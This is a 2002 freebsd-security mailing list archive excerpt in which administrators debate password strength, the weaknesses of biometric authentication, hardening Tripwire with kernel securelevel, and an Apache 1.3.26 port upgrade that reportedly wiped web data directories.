image of a fingerprint lifted from, say, your coffee mug. Yet others are vulnerable to trivial replay attacks. All of them are vulnerable to fake fingers (made of silicone or agar-agar) whose "fingerprint" can be reconstructed from a mold, or from a latent fingerprint (coffee mug again) made three-dimensional with a hobby PCB etching kit. Facial recognition systems have been tricked by photographs (or video clips for those with "live subject" safeguards) of the subject. Iris recognition systems have been tricked with printouts of an image of the subject's iris, with a hole cut in the middle for the attacker to see through. The fact that vendors have reacted by either denying the results or just refusing to discuss them does not increase my faith in the biometrics industry. I will not trust any biometric device until vendors start openly acknowledging and discussing possible attacks, and publishing the methods they use to resist them. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 9:49: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10103.mail.yahoo.com (web10103.mail.yahoo.com [216.136.130.53]) by hub.freebsd.org (Postfix) with SMTP id AE1EB37B403 for ; Wed, 19 Jun 2002 09:48:44 -0700 (PDT) Message-ID: <20020619164844.42032.qmail@web10103.mail.yahoo.com> Received: from [68.5.49.41] by web10103.mail.yahoo.com via HTTP; Wed, 19 Jun 2002 09:48:44 PDT Date: Wed, 19 Jun 2002 09:48:44 -0700 (PDT) From: twig les Subject: Re: Password security To: Dag-Erling Smorgrav , Eric F Crist Cc: 'Michael Sierchio' , 'Ryan Thompson' , freebsd-security@FreeBSD.ORG In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag, you have some very good points regarding Biometrics, but one thing that scares me about them that hasn't been mentioned (that I've seen) is that once your fingerprint is stolen it can never be trusted again. Same with a palm print, etc. If someone gets into the company database and nabs these things then replay attacks can follow you for years. Not likely, but possible. When you quit a job that uses a handscanner for data center access, what do they do with your print? I doubt they delete it and write over it 12+ times. Eric has a good point also though. The point of security (in my view) isn't to stop all attacks. It's to stop the almost all of them, while increasing the time and effort it takes the really good attacks to succeed. If you're running a NIDS and/or tripwire type thingies, then increasing the penetration time should allow you to react. As for the initial problem... I would take the lazy admin way out and upgrade the windoze SSH client to one that uses keys AND passwds (like ssh.com). You can give your users their key on a floppy with a notepad file on how to install this client on their home machine and where to put the key. Then have them chmod 700 C:\Windo...hmmm. Sorry. This solution kind of sucks, but it's simple and users won't go out of their way to subvert it. With all the other precautions you're taking it should work fine though. Also, maybe enforce 15 minute, passwd-protected screensavers on their boxes with a script they don't know exists. --- Dag-Erling Smorgrav wrote: > "Eric F Crist" writes: > > Of course the technology is not perfect. Things > such as cuts on your > > finger and blood-shot eyes can still fool these > systems, but password > > technology has its faults too. > > These are false negatives, which are annoying but > tolerable. I'm more > worried about false positives, and from what I can > see they're far too > easy to provoke. > > > Biometrics, on the other hand, requires a little > more work. If you > > couple basic username/password token systems, a > hardware or address > > token, such as I-button/smart card and IP address, > with either a retinal > > scanner or palm print, or finger print, or voice > recognition, there > > becomes a greater amount of homework to be done to > break into the > > system. > > Not when the biometric device is so easy to fool > that it becomes > practically irrelevant. Then the "passwords & > fingerprints" scheme is > reduced to just "passwords & warm fuzzy feelings". > > It has been shown empirically that "state of the > art" biometric > devices can be fooled by any amateur with a little > ingenuity and less > than $50 in supplies. Some fingerprint scanners are > so bad they can > be tricked into scanning and accepting the latent > print left on their > surface from the previous time they were used. > Others will accept an > image of a fingerprint lifted from, say, your coffee > mug. Yet others > are vulnerable to trivial replay attacks. All of > them are vulnerable > to fake fingers (made of silicone or agar-agar) > whose "fingerprint" > can be reconstructed from a mold, or from a latent > fingerprint (coffee > mug again) made three-dimensional with a hobby PCB > etching kit. > Facial recognition systems have been tricked by > photographs (or video > clips for those with "live subject" safeguards) of > the subject. Iris > recognition systems have been tricked with printouts > of an image of > the subject's iris, with a hole cut in the middle > for the attacker to > see through. > > The fact that vendors have reacted by either denying > the results or > just refusing to discuss them does not increase my > faith in the > biometrics industry. > > I will not trust any biometric device until vendors > start openly > acknowledging and discussing possible attacks, and > publishing the > methods they use to resist them. > > DES > -- > Dag-Erling Smorgrav - des@ofug.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 9:55:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10103.mail.yahoo.com (web10103.mail.yahoo.com [216.136.130.53]) by hub.freebsd.org (Postfix) with SMTP id 4C7C037B401 for ; Wed, 19 Jun 2002 09:55:07 -0700 (PDT) Message-ID: <20020619165507.43204.qmail@web10103.mail.yahoo.com> Received: from [68.5.49.41] by web10103.mail.yahoo.com via HTTP; Wed, 19 Jun 2002 09:55:07 PDT Date: Wed, 19 Jun 2002 09:55:07 -0700 (PDT) From: twig les Subject: Re: preventing tampering with tripwire To: Maxlor , "freebsd-security@FreeBSD.ORG" In-Reply-To: <2799555.1024487443@[10.0.0.16]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org - Change kern.securelevel to 1. This prevents > modifying any file which has > the schg flag set. The securelevel cannot be lowered > without a reboot. I've > got to think a bit about how preventing a lowering > through rebooting... > maybe schg'ing /etc/rc and /etc/rc.conf? > I bet an attacker would be pretty annoyed if he rooted your box, knew FreeBSD well enough to know the schg trick, rebooted, then found out that you had set a BIOS passwd. He'd have to be local and have a screwdriver :). Of course your remote admin would take a hit so it's up to circumstances whether you can do that or not. ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 10: 1:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from ren.sasknow.com (ren.sasknow.com [207.195.92.131]) by hub.freebsd.org (Postfix) with ESMTP id 89CF837B413 for ; Wed, 19 Jun 2002 10:01:12 -0700 (PDT) Received: from localhost (ryan@localhost) by ren.sasknow.com (8.11.6/8.11.6) with ESMTP id g5JH16916346; Wed, 19 Jun 2002 11:01:07 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Wed, 19 Jun 2002 11:01:06 -0600 (CST) From: Ryan Thompson To: Klaus Steden Cc: freebsd-security@FreeBSD.ORG Subject: Re: Password security In-Reply-To: <20020619013603.O99167@cthulu.compt.com> Message-ID: <20020619104812.W14256-100000@ren.sasknow.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Klaus Steden wrote to Ryan Thompson: > In the meantime, you could crack them on a regular basis for them. > John the Ripper does a pretty good job of my password files, with a > dictionary of about 6 million odd words. Done that. About 10% of the passwords fell within the first 10 minutes. After 36 hours on a PII-400MHz machine, I had done only a little better than that. That's probably *better* than many systems, but as long as one staff member's account can be easily compromised, I won't take much comfort in being "more secure" than the next network. :-) Ironically, our untrained customers seem to be at least as good as our trained staff members at choosing secure passwords. Knowledge and practice are clearly two orthogonal axes. :-) So, that's why I'm making an effort to mandate stronger passwords for staff members. (Customers are limited to chroot()'d FTP logins only, and staff members can be trained and encouraged to follow directions. :-) - Ryan -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901 1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 10: 2: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id F199C37B41B for ; Wed, 19 Jun 2002 10:01:40 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 03E965361; Wed, 19 Jun 2002 19:01:39 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: twig les Cc: Eric F Crist , 'Michael Sierchio' , 'Ryan Thompson' , freebsd-security@FreeBSD.ORG Subject: Re: Password security References: <20020619164844.42032.qmail@web10103.mail.yahoo.com> From: Dag-Erling Smorgrav Date: 19 Jun 2002 19:01:38 +0200 In-Reply-To: <20020619164844.42032.qmail@web10103.mail.yahoo.com> Message-ID: Lines: 18 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org twig les writes: > As for the initial problem... I would take the lazy > admin way out and upgrade the windoze SSH client to > one that uses keys AND passwds (like ssh.com). You > can give your users their key on a floppy with a > notepad file on how to install this client on their > home machine and where to put the key. That might be doable if you can somehow force users to pick good passphrases for their keys, but it doesn't defend against keyboard sniffing or a trojaned ssh client. I'd use OPIE, though you need a trusted, portable device (such as a PDA) for computing responses, otherwise someone could trojan your OPIE calculator and snarf your passphrase. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 10: 3:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 28D6737B41A; Wed, 19 Jun 2002 10:02:15 -0700 (PDT) Received: from [80.129.121.242] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.60 #1) id 17KiqT-0000s2-00; Wed, 19 Jun 2002 19:02:13 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 4A8C0E0; Wed, 19 Jun 2002 19:02:10 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id A9BDFDE; Wed, 19 Jun 2002 19:02:02 +0200 (CEST) Subject: Re: Apache 1.3.26 port From: Jan Lentfer To: Ken Menzel Cc: freebsd-security@FreeBSD.ORG, freebsd-ports@FreeBSD.ORG In-Reply-To: <004b01c217b1$6ff56a80$681663cf@icarz.com> References: <1024460049.2166.6.camel@jan-linnb.lan> <20020619112415.A55069@cowbert.2y.net> <1024500871.3d10a487acc8e@www-mail.lan> <004b01c217b1$6ff56a80$681663cf@icarz.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 19 Jun 2002 19:02:01 +0200 Message-Id: <1024506121.2846.2.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Mit, 2002-06-19 um 18.50 schrieb Ken Menzel: > "make reinstall" worked just fine for me, except I need to comment > out mod_define and recompile php (make; make reinstall;). > > Hope this helps > Ken Actually I was also wondering a little why it didn't complain about "make install" - it just went ahead. On my production machine at university I also had to comment out mod_define (what's that for??) and recompile mod_php4 and mod_fastcgi (for Zope). It seems to work ok now (PHProjekt and Zope through Apache) Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 10: 8:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.avint.net (pegasus.avint.net [198.165.75.245]) by hub.freebsd.org (Postfix) with ESMTP id 0366737B40A for ; Wed, 19 Jun 2002 10:07:36 -0700 (PDT) Received: from hercules.avint.net (hercules.avint.net [198.165.75.7]) by mail.avint.net (8.11.6/8.11.6) with SMTP id g5JH4kk20342 for ; Wed, 19 Jun 2002 14:34:46 -0230 From: graham To: freebsd-security@FreeBSD.ORG Subject: Re: Password security Date: Wed, 19 Jun 2002 14:20:30 -0230 X-Mailer: KMail [version 1.0.28] Content-Type: text/plain References: <20020619164844.42032.qmail@web10103.mail.yahoo.com> In-Reply-To: <20020619164844.42032.qmail@web10103.mail.yahoo.com> MIME-Version: 1.0 Message-Id: <02061914352901.22345@hercules.avint.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It's alot easier to fool Biometrics than you think. I saw an episode of @discovery on The Discovery Channel's Canadian channel explaining how a mathematician and some grad students could fool all the current commercial biometric systems with common household items available from any supermarket. But I don't fully remember the details of that paticular episode. On Wed, 19 Jun 2002, twig les wrote: > Dag, you have some very good points regarding > Biometrics, but one thing that scares me about them > that hasn't been mentioned (that I've seen) is that > once your fingerprint is stolen it can never be > trusted again. Same with a palm print, etc. If > someone gets into the company database and nabs these > things then replay attacks can follow you for years. > Not likely, but possible. When you quit a job that > uses a handscanner for data center access, what do > they do with your print? I doubt they delete it and > write over it 12+ times. > > Eric has a good point also though. The point of > security (in my view) isn't to stop all attacks. It's > to stop the almost all of them, while increasing the > time and effort it takes the really good attacks to > succeed. If you're running a NIDS and/or tripwire > type thingies, then increasing the penetration time > should allow you to react. > > As for the initial problem... I would take the lazy > admin way out and upgrade the windoze SSH client to > one that uses keys AND passwds (like ssh.com). You > can give your users their key on a floppy with a > notepad file on how to install this client on their > home machine and where to put the key. Then have them > chmod 700 C:\Windo...hmmm. Sorry. > > This solution kind of sucks, but it's simple and users > won't go out of their way to subvert it. With all the > other precautions you're taking it should work fine > though. Also, maybe enforce 15 minute, > passwd-protected screensavers on their boxes with a > script they don't know exists. > > > --- Dag-Erling Smorgrav wrote: > > "Eric F Crist" writes: > > > Of course the technology is not perfect. Things > > such as cuts on your > > > finger and blood-shot eyes can still fool these > > systems, but password > > > technology has its faults too. > > > > These are false negatives, which are annoying but > > tolerable. I'm more > > worried about false positives, and from what I can > > see they're far too > > easy to provoke. > > > > > Biometrics, on the other hand, requires a little > > more work. If you > > > couple basic username/password token systems, a > > hardware or address > > > token, such as I-button/smart card and IP address, > > with either a retinal > > > scanner or palm print, or finger print, or voice > > recognition, there > > > becomes a greater amount of homework to be done to > > break into the > > > system. > > > > Not when the biometric device is so easy to fool > > that it becomes > > practically irrelevant. Then the "passwords & > > fingerprints" scheme is > > reduced to just "passwords & warm fuzzy feelings". > > > > It has been shown empirically that "state of the > > art" biometric > > devices can be fooled by any amateur with a little > > ingenuity and less > > than $50 in supplies. Some fingerprint scanners are > > so bad they can > > be tricked into scanning and accepting the latent > > print left on their > > surface from the previous time they were used. > > Others will accept an > > image of a fingerprint lifted from, say, your coffee > > mug. Yet others > > are vulnerable to trivial replay attacks. All of > > them are vulnerable > > to fake fingers (made of silicone or agar-agar) > > whose "fingerprint" > > can be reconstructed from a mold, or from a latent > > fingerprint (coffee > > mug again) made three-dimensional with a hobby PCB > > etching kit. > > Facial recognition systems have been tricked by > > photographs (or video > > clips for those with "live subject" safeguards) of > > the subject. Iris > > recognition systems have been tricked with printouts > > of an image of > > the subject's iris, with a hole cut in the middle > > for the attacker to > > see through. > > > > The fact that vendors have reacted by either denying > > the results or > > just refusing to discuss them does not increase my > > faith in the > > biometrics industry. > > > > I will not trust any biometric device until vendors > > start openly > > acknowledging and discussing possible attacks, and > > publishing the > > methods they use to resist them. > > > > DES > > -- > > Dag-Erling Smorgrav - des@ofug.org > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > > the message > > > ===== > ----------------------------------------------------------- > Only fools have all the answers. > ----------------------------------------------------------- > > __________________________________________________ > Do You Yahoo!? > Yahoo! - Official partner of 2002 FIFA World Cup > http://fifaworldcup.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 10:20:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10103.mail.yahoo.com (web10103.mail.yahoo.com [216.136.130.53]) by hub.freebsd.org (Postfix) with SMTP id BD82337B417 for ; Wed, 19 Jun 2002 10:19:22 -0700 (PDT) Message-ID: <20020619171922.48193.qmail@web10103.mail.yahoo.com> Received: from [68.5.49.41] by web10103.mail.yahoo.com via HTTP; Wed, 19 Jun 2002 10:19:22 PDT Date: Wed, 19 Jun 2002 10:19:22 -0700 (PDT) From: twig les Subject: Re: Password security To: graham , freebsd-security@FreeBSD.ORG In-Reply-To: <02061914352901.22345@hercules.avint.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --- graham wrote: > It's alot easier to fool Biometrics than you think. > I saw an episode of @discovery on The Discovery > Channel's Canadian channel > explaining how a mathematician and some grad > students could fool all the current > commercial biometric systems with common household > items available from any > supermarket. But I don't fully remember the details > of that paticular episode. > > I don't doubt it (although I missed the special), but I don't know anyone who advocates the use of biometrics as the sole method of authentication (US airport security aside...). Most of the time I've used them you either needed a badge with it, or a badge/PIN combo. The addition of biometrics to a badge or badge/PIN combo -even if it was tuned to give more false positives than negatives- makes a huge difference. So what interests me is could these guys beat the handprint reader WHILE they have a stolen/forged smartcard AND someone's PIN code (all matching the same person of course)? If they can do that then my hat is off to them and they should be Sneakers 2. ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 11:20:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from favour.one2net.co.ug (g-class.sanyutel.com [216.250.215.27]) by hub.freebsd.org (Postfix) with ESMTP id 2902F37B40B; Wed, 19 Jun 2002 11:20:34 -0700 (PDT) Received: from localhost (localhost.one2net.co.ug [127.0.0.1]) by favour.one2net.co.ug (Postfix) with ESMTP id 78EA654833; Wed, 19 Jun 2002 21:20:35 +0300 (EAT) Date: Wed, 19 Jun 2002 21:20:35 +0300 (EAT) From: Noah K Sematimba X-X-Sender: ksemat@favour.one2net.co.ug To: Jan Lentfer Cc: Ken Menzel , , Subject: Re: Apache 1.3.26 port In-Reply-To: <1024506121.2846.2.camel@jan-linux.lan> Message-ID: <20020619211914.A79940-100000@favour.one2net.co.ug> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Forgive for the OT but php4 apparently will not compile with the new apache 2.0.39 some error concerning pth. Noah. On 19 Jun 2002, Jan Lentfer wrote: > Am Mit, 2002-06-19 um 18.50 schrieb Ken Menzel: > > "make reinstall" worked just fine for me, except I need to comment > > out mod_define and recompile php (make; make reinstall;). > > > > Hope this helps > > Ken > > Actually I was also wondering a little why it didn't complain about > "make install" - it just went ahead. > On my production machine at university I also had to comment out > mod_define (what's that for??) and recompile mod_php4 and mod_fastcgi > (for Zope). It seems to work ok now (PHProjekt and Zope through Apache) > > > Jan > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 11:32:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id 8FF8B37B405 for ; Wed, 19 Jun 2002 11:31:51 -0700 (PDT) Received: from armageddon (12-24-254-119.man.mn.charter.com [12.24.254.119]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5JIR99g046745; Wed, 19 Jun 2002 14:27:10 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'twig les'" , "'graham'" , Subject: RE: Password security (my final post on this particular thread) Date: Wed, 19 Jun 2002 13:30:56 -0500 Message-ID: <004101c217bf$74a26f70$77fe180c@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <20020619171922.48193.qmail@web10103.mail.yahoo.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It's apparent that this conversation could go on forever. It is also apparent that Ryan Thompson (original poster) is in search of a 100% fool proof method of authentication, which all of us know doesn't exist. Basically, we all seem to have come to the consensus that: 1) Password security is not perfect due the inability of most people/users of data networks to remember and conjure up difficult, complex, or hard to guess passwords. 2) Biometrics is not a fool proof method of authentication and there are ways to trick these devices. 3) The generally agreed upon method for the most secure method of authentication over a seemingly insecure data network would be to combine a multitude of different technology, all dependent on each other. Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of twig les Sent: Wednesday, June 19, 2002 12:19 PM To: graham; freebsd-security@FreeBSD.ORG Subject: Re: Password security --- graham wrote: > It's alot easier to fool Biometrics than you think. > I saw an episode of @discovery on The Discovery > Channel's Canadian channel > explaining how a mathematician and some grad > students could fool all the current > commercial biometric systems with common household > items available from any > supermarket. But I don't fully remember the details > of that paticular episode. > > I don't doubt it (although I missed the special), but I don't know anyone who advocates the use of biometrics as the sole method of authentication (US airport security aside...). Most of the time I've used them you either needed a badge with it, or a badge/PIN combo. The addition of biometrics to a badge or badge/PIN combo -even if it was tuned to give more false positives than negatives- makes a huge difference. So what interests me is could these guys beat the handprint reader WHILE they have a stolen/forged smartcard AND someone's PIN code (all matching the same person of course)? If they can do that then my hat is off to them and they should be Sneakers 2. ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 12:14:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from hercules.icarz.com (ns1.icarz.com [207.99.22.7]) by hub.freebsd.org (Postfix) with ESMTP id 452DD37B407; Wed, 19 Jun 2002 12:14:47 -0700 (PDT) Received: from newken (dhcp104.icarz.com [207.99.22.104]) by hercules.icarz.com (8.11.6/8.10.1) with SMTP id g5JGoYG21082; Wed, 19 Jun 2002 12:50:36 -0400 (EDT) Message-ID: <004b01c217b1$6ff56a80$681663cf@icarz.com> From: "Ken Menzel" To: "Jan Lentfer" Cc: , References: <1024460049.2166.6.camel@jan-linnb.lan> <20020619112415.A55069@cowbert.2y.net> <1024500871.3d10a487acc8e@www-mail.lan> Subject: Re: Apache 1.3.26 port Date: Wed, 19 Jun 2002 12:50:35 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "make reinstall" worked just fine for me, except I need to comment out mod_define and recompile php (make; make reinstall;). Hope this helps Ken ----- Original Message ----- From: "Jan Lentfer" Cc: ; Sent: Wednesday, June 19, 2002 11:34 AM Subject: Re: Apache 1.3.26 port > Zitat von "Peter C. Lai" : > > > did you use portupgrade to upgrade? > > No, just "make all install clean" > > Jan > > ------------------------------------------------- > This mail sent through IMP: http://horde.org/imp/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 14:10:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 863CD37B408 for ; Wed, 19 Jun 2002 14:10:29 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA24232; Wed, 19 Jun 2002 15:10:13 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020619150748.0236b1d0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 19 Jun 2002 15:10:06 -0600 To: Jan Lentfer , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Apache 1.3.26 port In-Reply-To: <1024460049.2166.6.camel@jan-linnb.lan> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yes, installing the new port will nuke all of your data. And, as has been the case with many other ports, the package has not been built and put up on the FTP site. Everyone who installs FreeBSD and elects to install Apache across the Net will get the insecure version of Apache until this is fixed. It's just as important to upgrade the binary packages (and/or mark them as "forbidden") as it is the ports. --Brett At 10:14 PM 6/18/2002, Jan Lentfer wrote: >Hi, > >i am new to this list, so I don't know if this is the right place for my >comment, so please be gentle ;-) > >After reading all the mail about the apache vulnerability, today I >installed the new 1.3.26 port. The compilation, etc. went clean, I also >had to reinstall mod_php4 and mod_fastcgi until I could make apache >start. Then I found that all my subdirectories in /usr/local/data/www >were gone (deleted)!! Luckily this was on my private machine! Is this a >normal behaviour? Anyway, it's good I know it now so I will for sure >backup the directorires on my production machines > > >Regards, > >Jan Lentfer > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 14:14:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from pike.epylon.com (mail03.epylon.com [63.93.9.99]) by hub.freebsd.org (Postfix) with ESMTP id 44B0937B407 for ; Wed, 19 Jun 2002 14:14:21 -0700 (PDT) Received: from [192.168.4.154] (sf-gw.epylon.com [63.93.9.98]) by pike.epylon.com (Postfix) with ESMTP id 6BD3559218; Wed, 19 Jun 2002 14:14:20 -0700 (PDT) User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Wed, 19 Jun 2002 14:14:18 -0700 Subject: Re: Apache 1.3.26 port From: Jason DiCioccio To: Brett Glass , Jan Lentfer , Message-ID: In-Reply-To: <4.3.2.7.2.20020619150748.0236b1d0@localhost> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I would consider this semi-correct, at least from my experience. The data directories ARE seperated out. Notice that there is a data.default and a cgi-bin.default which data and cgi-bin are linked to. If you break the data/cgi-bin symlinks and just mkdir data/mkdir cgi-bin, your data should not be overwritten, it should only overwrite data.default. If this is another issue, I haven't encountered it. Cheers, -JD- On 6/19/02 2:10 PM, "Brett Glass" wrote: > Yes, installing the new port will nuke all of your data. [snip] > > At 10:14 PM 6/18/2002, Jan Lentfer wrote: > >> Hi, >> >> i am new to this list, so I don't know if this is the right place for my >> comment, so please be gentle ;-) >> >> After reading all the mail about the apache vulnerability, today I >> installed the new 1.3.26 port. The compilation, etc. went clean, I also >> had to reinstall mod_php4 and mod_fastcgi until I could make apache >> start. Then I found that all my subdirectories in /usr/local/data/www >> were gone (deleted)!! Luckily this was on my private machine! Is this a >> normal behaviour? Anyway, it's good I know it now so I will for sure >> backup the directorires on my production machines [snip] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the 